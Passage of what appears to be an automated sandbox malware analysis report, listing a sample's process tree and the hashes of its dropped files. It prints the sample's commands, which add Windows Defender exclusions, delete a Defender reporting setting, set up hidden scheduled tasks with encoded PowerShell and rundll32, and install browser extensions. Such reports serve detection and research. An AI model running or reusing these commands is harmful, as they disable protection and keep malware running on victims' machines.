\"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\LvGDzkYwvMWaEHuqL\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\LvGDzkYwvMWaEHuqL\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\bbCFMBnbWHvqPYnk\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\bbCFMBnbWHvqPYnk\" /t REG_DWORD /d 0 /reg:64;"
                                                                                            2⤵
                                                                                            • Drops file in System32 directory
                                                                                            • Modifies data under HKEY_USERS
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:748
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OEzFEJJUXGhhC" /t REG_DWORD /d 0 /reg:32
                                                                                              3⤵
                                                                                                PID:2736
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OEzFEJJUXGhhC" /t REG_DWORD /d 0 /reg:32
                                                                                                  4⤵
                                                                                                    PID:1860
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OEzFEJJUXGhhC" /t REG_DWORD /d 0 /reg:64
                                                                                                  3⤵
                                                                                                    PID:2684
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jDuHzkIsBvCU2" /t REG_DWORD /d 0 /reg:32
                                                                                                    3⤵
                                                                                                      PID:4108
                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jDuHzkIsBvCU2" /t REG_DWORD /d 0 /reg:64
                                                                                                      3⤵
                                                                                                        PID:4504
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rkowPKVfGlUn" /t REG_DWORD /d 0 /reg:32
                                                                                                        3⤵
                                                                                                          PID:2604
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rkowPKVfGlUn" /t REG_DWORD /d 0 /reg:64
                                                                                                          3⤵
                                                                                                            PID:3568
                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vCSdqahflWztnyCJPDR" /t REG_DWORD /d 0 /reg:32
                                                                                                            3⤵
                                                                                                              PID:1296
                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vCSdqahflWztnyCJPDR" /t REG_DWORD /d 0 /reg:64
                                                                                                              3⤵
                                                                                                                PID:712
                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zIOXOzNnU" /t REG_DWORD /d 0 /reg:32
                                                                                                                3⤵
                                                                                                                  PID:1984
                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zIOXOzNnU" /t REG_DWORD /d 0 /reg:64
                                                                                                                  3⤵
                                                                                                                    PID:2652
                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\BCsIBCZjkJGSaeVB /t REG_DWORD /d 0 /reg:32
                                                                                                                    3⤵
                                                                                                                      PID:2204
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\BCsIBCZjkJGSaeVB /t REG_DWORD /d 0 /reg:64
                                                                                                                      3⤵
                                                                                                                        PID:1652
                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                        3⤵
                                                                                                                          PID:2104
                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                          3⤵
                                                                                                                            PID:3848
                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                            3⤵
                                                                                                                              PID:4704
                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                              3⤵
                                                                                                                                PID:1804
                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\LvGDzkYwvMWaEHuqL /t REG_DWORD /d 0 /reg:32
                                                                                                                                3⤵
                                                                                                                                  PID:2068
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\LvGDzkYwvMWaEHuqL /t REG_DWORD /d 0 /reg:64
                                                                                                                                  3⤵
                                                                                                                                    PID:3968
                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\bbCFMBnbWHvqPYnk /t REG_DWORD /d 0 /reg:32
                                                                                                                                    3⤵
                                                                                                                                      PID:2352
                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\bbCFMBnbWHvqPYnk /t REG_DWORD /d 0 /reg:64
                                                                                                                                      3⤵
                                                                                                                                        PID:2464
                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                      schtasks /CREATE /TN "gHDenUUva" /SC once /ST 09:36:46 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                      2⤵
                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                      PID:1544
                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                      schtasks /run /I /tn "gHDenUUva"
                                                                                                                                      2⤵
                                                                                                                                        PID:4292
                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                        schtasks /DELETE /F /TN "gHDenUUva"
                                                                                                                                        2⤵
                                                                                                                                          PID:2604
                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                          schtasks /CREATE /TN "AhjSMCowIpwbbADJB" /SC once /ST 03:16:22 /RU "SYSTEM" /TR "\"C:\Windows\Temp\bbCFMBnbWHvqPYnk\sdFIIEPQPxFDiVz\JGTVJIz.exe\" lT /bLsite_idJNA 385118 /S" /V1 /F
                                                                                                                                          2⤵
                                                                                                                                          • Drops file in Windows directory
                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                          PID:1560
                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                          schtasks /run /I /tn "AhjSMCowIpwbbADJB"
                                                                                                                                          2⤵
                                                                                                                                            PID:2712
                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                          1⤵
                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                          PID:1588
                                                                                                                                          • C:\Windows\system32\gpupdate.exe
                                                                                                                                            "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                            2⤵
                                                                                                                                              PID:980
                                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                                            C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                                            1⤵
                                                                                                                                              PID:3152
                                                                                                                                            • C:\Windows\system32\gpscript.exe
                                                                                                                                              gpscript.exe /RefreshSystemParam
                                                                                                                                              1⤵
                                                                                                                                                PID:1900
                                                                                                                                              • C:\Windows\Temp\bbCFMBnbWHvqPYnk\sdFIIEPQPxFDiVz\JGTVJIz.exe
                                                                                                                                                C:\Windows\Temp\bbCFMBnbWHvqPYnk\sdFIIEPQPxFDiVz\JGTVJIz.exe lT /bLsite_idJNA 385118 /S
                                                                                                                                                1⤵
                                                                                                                                                • Checks computer location settings
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Drops Chrome extension
                                                                                                                                                • Drops desktop.ini file(s)
                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                • Drops file in Program Files directory
                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                PID:1060
                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                  schtasks /DELETE /F /TN "bwrELlnqjSCVVAtkbD"
                                                                                                                                                  2⤵
                                                                                                                                                    PID:5016
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                                                                                                                                    2⤵
                                                                                                                                                      PID:968
                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                        REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                                                                                                                                        3⤵
                                                                                                                                                          PID:4984
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                                                                                                                                                        2⤵
                                                                                                                                                          PID:3532
                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                            REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                                                                                                                                                            3⤵
                                                                                                                                                              PID:220
                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                            schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\zIOXOzNnU\qIWtKJ.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "PcnSyXWgXjsFhaV" /V1 /F
                                                                                                                                                            2⤵
                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                            PID:2180
                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                            schtasks /CREATE /TN "PcnSyXWgXjsFhaV2" /F /xml "C:\Program Files (x86)\zIOXOzNnU\NibApvo.xml" /RU "SYSTEM"
                                                                                                                                                            2⤵
                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                            PID:1720
                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                            schtasks /END /TN "PcnSyXWgXjsFhaV"
                                                                                                                                                            2⤵
                                                                                                                                                              PID:1296
                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                              schtasks /DELETE /F /TN "PcnSyXWgXjsFhaV"
                                                                                                                                                              2⤵
                                                                                                                                                                PID:4312
                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                schtasks /CREATE /TN "vEJeJIpuilXQdg" /F /xml "C:\Program Files (x86)\jDuHzkIsBvCU2\PWhGQEm.xml" /RU "SYSTEM"
                                                                                                                                                                2⤵
                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                PID:4724
                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                schtasks /CREATE /TN "oxHwMJOcGansS2" /F /xml "C:\ProgramData\BCsIBCZjkJGSaeVB\TZTEmhX.xml" /RU "SYSTEM"
                                                                                                                                                                2⤵
                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                PID:4644
                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                schtasks /CREATE /TN "rmxWMeowhQIGGSdiB2" /F /xml "C:\Program Files (x86)\vCSdqahflWztnyCJPDR\xfLmUMO.xml" /RU "SYSTEM"
                                                                                                                                                                2⤵
                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                PID:4192
                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                schtasks /CREATE /TN "nUhGWOfcIDAowxbfdvM2" /F /xml "C:\Program Files (x86)\OEzFEJJUXGhhC\zWwSJer.xml" /RU "SYSTEM"
                                                                                                                                                                2⤵
                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                PID:2312
                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                schtasks /CREATE /TN "uChdezcgVJxKqqpxw" /SC once /ST 05:44:39 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\bbCFMBnbWHvqPYnk\THxlVryQ\QczZyTN.dll\",#1 /Pfsite_idxvv 385118" /V1 /F
                                                                                                                                                                2⤵
                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                PID:2180
                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                schtasks /run /I /tn "uChdezcgVJxKqqpxw"
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:4980
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:2912
                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:4992
                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:2216
                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                          REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:1388
                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                          schtasks /DELETE /F /TN "AhjSMCowIpwbbADJB"
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:4208
                                                                                                                                                                        • C:\Windows\system32\rundll32.EXE
                                                                                                                                                                          C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\bbCFMBnbWHvqPYnk\THxlVryQ\QczZyTN.dll",#1 /Pfsite_idxvv 385118
                                                                                                                                                                          1⤵
                                                                                                                                                                            PID:5008
                                                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                              C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\bbCFMBnbWHvqPYnk\THxlVryQ\QczZyTN.dll",#1 /Pfsite_idxvv 385118
                                                                                                                                                                              2⤵
                                                                                                                                                                              • Blocklisted process makes network request
                                                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                              • Enumerates system info in registry
                                                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                                                              PID:1104
                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                schtasks /DELETE /F /TN "uChdezcgVJxKqqpxw"
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:3424

                                                                                                                                                                            Network

                                                                                                                                                                            MITRE ATT&CK Enterprise v15

                                                                                                                                                                            Replay Monitor

                                                                                                                                                                            Loading Replay Monitor...

                                                                                                                                                                            Downloads

                                                                                                                                                                            • C:\Program Files (x86)\OEzFEJJUXGhhC\zWwSJer.xml

                                                                                                                                                                              Filesize

                                                                                                                                                                              2KB

                                                                                                                                                                              MD5

                                                                                                                                                                              dfef5abdd4f21251e96455e5c1cb9114

                                                                                                                                                                              SHA1

                                                                                                                                                                              aaca7925cee210fea3c16ca2adca4503e02c68f2

                                                                                                                                                                              SHA256

                                                                                                                                                                              902767349558be3f8632ad268e81dbcc8e1cc8cb88fb80e610579a419917aa7a

                                                                                                                                                                              SHA512

                                                                                                                                                                              c883ba6259b68073c4109a87890316780c6e8876244000948635e0e5ed41a37b47386fc4899a00de42e20a6850613f710eeb1e530fdc83a8751d16bd0b66782d

                                                                                                                                                                            • C:\Program Files (x86)\jDuHzkIsBvCU2\PWhGQEm.xml

                                                                                                                                                                              Filesize

                                                                                                                                                                              2KB

                                                                                                                                                                              MD5

                                                                                                                                                                              a2e129f660db9240e1ec7de90871c083

                                                                                                                                                                              SHA1

                                                                                                                                                                              ac02a900d83c18f441ef79466353273a0eaf5e4b

                                                                                                                                                                              SHA256

                                                                                                                                                                              478acb18bfdc66c21b6d75431a0c74753fb4cb385219285a5aef17baf0bfa780

                                                                                                                                                                              SHA512

                                                                                                                                                                              5c3a7e835c9c821671723fe7c725a39c034be96c07d2fd94dfda3bb3e743f5ba07d7fa2cf443fa7e7cb4ee24466edb2686c1c40102ce1c85a47938c0365ca2da

                                                                                                                                                                            • C:\Program Files (x86)\vCSdqahflWztnyCJPDR\xfLmUMO.xml

                                                                                                                                                                              Filesize

                                                                                                                                                                              2KB

                                                                                                                                                                              MD5

                                                                                                                                                                              e098373e12b03e6bed83e78d8bbc91f9

                                                                                                                                                                              SHA1

                                                                                                                                                                              4e794f6855fd3edc6369b4e86d684ffdf2a5bf5b

                                                                                                                                                                              SHA256

                                                                                                                                                                              db63d0598b50253bf17312571d023d28d076229c026358127d1e3ee9d864ef05

                                                                                                                                                                              SHA512

                                                                                                                                                                              825b439680d5497c4d5438bf3d363f6e56a7b0ca48ef3ebdfd87799d58df6b2707234666a9bcb016d75edcf4dff08b0e1c62604dd99632e34303e362cc6a7d72

                                                                                                                                                                            • C:\Program Files (x86)\zIOXOzNnU\NibApvo.xml

                                                                                                                                                                              Filesize

                                                                                                                                                                              2KB

                                                                                                                                                                              MD5

                                                                                                                                                                              4bd146ebdd9039f1225f578c21acaf74

                                                                                                                                                                              SHA1

                                                                                                                                                                              8752a9368de9c28b2003d1c15718d54c8103a7c1

                                                                                                                                                                              SHA256

                                                                                                                                                                              e1793046122e588104610abe3731f6a7b374f66115c248efe71478b34670b207

                                                                                                                                                                              SHA512

                                                                                                                                                                              fba4a52e4e64de6172fdc7cf59b92df105aaa46b175e393feff3f6a454779f7ff7238f87f10853edc9b00454f24d1581d5af87aed205256787df8f754038ca27

                                                                                                                                                                            • C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

                                                                                                                                                                              Filesize

                                                                                                                                                                              1.8MB

                                                                                                                                                                              MD5

                                                                                                                                                                              b13ad80cd6a6d002c318b26b34fb880f

                                                                                                                                                                              SHA1

                                                                                                                                                                              8acf8a65fe30e4e4b26500275fbac896bcaf8c29

                                                                                                                                                                              SHA256

                                                                                                                                                                              2858b14b3cdd830a4c28714d59b3c2f268c974a540efba3933f4c4db3435012b

                                                                                                                                                                              SHA512

                                                                                                                                                                              1a176af89c8d9fd60fd013fe85a17d3ddce4f73c483ea74ba8e1e2f4458a0cbf0645b752ec6c88ec6bf52b2fc9161a9bdd3c5338122b2da7edb1cd1f3075f1b9

                                                                                                                                                                            • C:\ProgramData\BCsIBCZjkJGSaeVB\TZTEmhX.xml

                                                                                                                                                                              Filesize

                                                                                                                                                                              2KB

                                                                                                                                                                              MD5

                                                                                                                                                                              d83606540a4e1f55e26928e3a8e97192

                                                                                                                                                                              SHA1

                                                                                                                                                                              f52225ac9ad5489f9b901c7a6b6be69671f84ed6

                                                                                                                                                                              SHA256

                                                                                                                                                                              d06d6b834b7f443309f01a25b329bdf27b913950cdedc39ce4b1ebfee76fe0b0

                                                                                                                                                                              SHA512

                                                                                                                                                                              6c31a0f7f3e63602d4b60422f181d3b4578002bd24d5c23222b99c35cf0cb7a440ddc92975b86c5357db9d0e46cc2eedbd8e2ca3366dad5fce04b901f17c9626

                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

                                                                                                                                                                              Filesize

                                                                                                                                                                              187B

                                                                                                                                                                              MD5

                                                                                                                                                                              2a1e12a4811892d95962998e184399d8

                                                                                                                                                                              SHA1

                                                                                                                                                                              55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

                                                                                                                                                                              SHA256

                                                                                                                                                                              32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

                                                                                                                                                                              SHA512

                                                                                                                                                                              bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

                                                                                                                                                                              Filesize

                                                                                                                                                                              136B

                                                                                                                                                                              MD5

                                                                                                                                                                              238d2612f510ea51d0d3eaa09e7136b1

                                                                                                                                                                              SHA1

                                                                                                                                                                              0953540c6c2fd928dd03b38c43f6e8541e1a0328

                                                                                                                                                                              SHA256

                                                                                                                                                                              801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

                                                                                                                                                                              SHA512

                                                                                                                                                                              2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

                                                                                                                                                                              Filesize

                                                                                                                                                                              150B

                                                                                                                                                                              MD5

                                                                                                                                                                              0b1cf3deab325f8987f2ee31c6afc8ea

                                                                                                                                                                              SHA1

                                                                                                                                                                              6a51537cef82143d3d768759b21598542d683904

                                                                                                                                                                              SHA256

                                                                                                                                                                              0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

                                                                                                                                                                              SHA512

                                                                                                                                                                              5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                                                                              Filesize

                                                                                                                                                                              10KB

                                                                                                                                                                              MD5

                                                                                                                                                                              c6b1fb9049079f9140fe41b01a769c84

                                                                                                                                                                              SHA1

                                                                                                                                                                              88712f693723464485f660f237ea392fb3478e78

                                                                                                                                                                              SHA256

                                                                                                                                                                              3ae25e119b2120e3178571d62777d7588e1dc3f2013e98e37a0a2f15374d164f

                                                                                                                                                                              SHA512

                                                                                                                                                                              b7f26d671717a2b5a4fb0684b3d25496dec10441113f0192e28e4a4e60f2c468dfd45a1d3ebd8f5f239898f496bfd72b27a3c661de2c98b10a7edec87f844144

                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log

                                                                                                                                                                              Filesize

                                                                                                                                                                              2KB

                                                                                                                                                                              MD5

                                                                                                                                                                              6cf293cb4d80be23433eecf74ddb5503

                                                                                                                                                                              SHA1

                                                                                                                                                                              24fe4752df102c2ef492954d6b046cb5512ad408

                                                                                                                                                                              SHA256

                                                                                                                                                                              b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

                                                                                                                                                                              SHA512

                                                                                                                                                                              0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json

                                                                                                                                                                              Filesize

                                                                                                                                                                              151B

                                                                                                                                                                              MD5

                                                                                                                                                                              bd6b60b18aee6aaeb83b35c68fb48d88

                                                                                                                                                                              SHA1

                                                                                                                                                                              9b977a5fbf606d1104894e025e51ac28b56137c3

                                                                                                                                                                              SHA256

                                                                                                                                                                              b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55

                                                                                                                                                                              SHA512

                                                                                                                                                                              3500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b

                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                              Filesize

                                                                                                                                                                              9KB

                                                                                                                                                                              MD5

                                                                                                                                                                              82425a89e430d46f8692a16f8262ffb4

                                                                                                                                                                              SHA1

                                                                                                                                                                              cdcb6f207b6788bdb0f2a4eeb420babcfd523bae

                                                                                                                                                                              SHA256

                                                                                                                                                                              5f1d946303754a21dfb9c357481ce0de19a43508981d5dc2b2cf2da023abfd67

                                                                                                                                                                              SHA512

                                                                                                                                                                              90b6a187fd9fce467930810b68f884eff36bd8a735b77013c1b82fe919c81523a0369debc1c99937a7ddc02a7768fed52087cd0383ec4b130f1b60eb439658cf

                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                              Filesize

                                                                                                                                                                              18KB

                                                                                                                                                                              MD5

                                                                                                                                                                              ebb29e061888a177954be6de9daa7f1b

                                                                                                                                                                              SHA1

                                                                                                                                                                              aef08fbfe67ad70adf0f88fd9668559c5ac6933c

                                                                                                                                                                              SHA256

